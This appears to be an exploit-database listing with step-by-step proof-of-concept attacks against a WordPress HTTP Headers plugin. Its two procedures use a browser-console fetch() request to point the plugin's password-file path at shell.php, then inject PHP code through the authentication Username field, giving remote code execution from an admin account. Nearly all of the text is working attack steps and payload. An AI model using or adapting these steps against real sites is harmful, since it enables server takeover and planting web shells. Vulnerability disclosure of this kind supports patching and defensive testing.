Share
## https://sploitus.com/exploit?id=WPEX-ID:E0CC6740-866A-4A81-A93D-FF486B79B7F7
--- <= 1.18.10 PoC ---
1. As an admin, visit http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&tab=advanced, and paste the following in your browser's prompt:

await fetch("/wp-admin/options.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "body": `option_page=http-headers-mtd&action=update&_wpnonce=${jQuery('#_wpnonce').attr('value')}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dhttp-headers%26tab%3Dadvanced&hh_htaccess_path=%2Fvar%2Fwww%2Fhtml%2F.htaccess&hh_user_ini_path=%2Fvar%2Fwww%2Fhtml%2F.user.ini&hh_htpasswd_path=%2Fvar%2Fwww%2Fhtml%2Fshell.php&hh_htdigest_path=%2Fvar%2Fwww%2Fhtml%2F.hh-htdigest&hh_method=htaccess`,
    "method": "POST",
    "mode": "cors"
});
2. Navigate to http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&header=www-authenticate
3. Ensure WWW-Authenticate is enabled, and fill the form with Username "<?php echo "RCE" ?>" and Password as any value.
4. Navigate to Settings > HTTP Headers > Advanced settings and set the "Location of .hh-htpasswd" field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file).
5. Go to /shell.php and see the RCE text.


--- Pre-1.18.8 PoC ---

1. As an admin user within WP Admin, navigate to Settings > HTTP Headers > Advanced settings.
2. Change the "Location of .hh-htpasswd" field: update the file name to "shell.php" (e.g. /var/www/html/shell.php)
3. Navigate to Settings > HTTP Headers > Authentication. Click "Edit" to the right of "WWW-Authenticate".
4. Ensure WWW-Authenticate is enabled, and fill the form with Username "<?php echo "RCE" ?>" and Password as any value.
5. Navigate to Settings > HTTP Headers > Advanced settings and set the "Location of .hh-htpasswd" field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file).
6. Go to /shell.php and see the RCE text.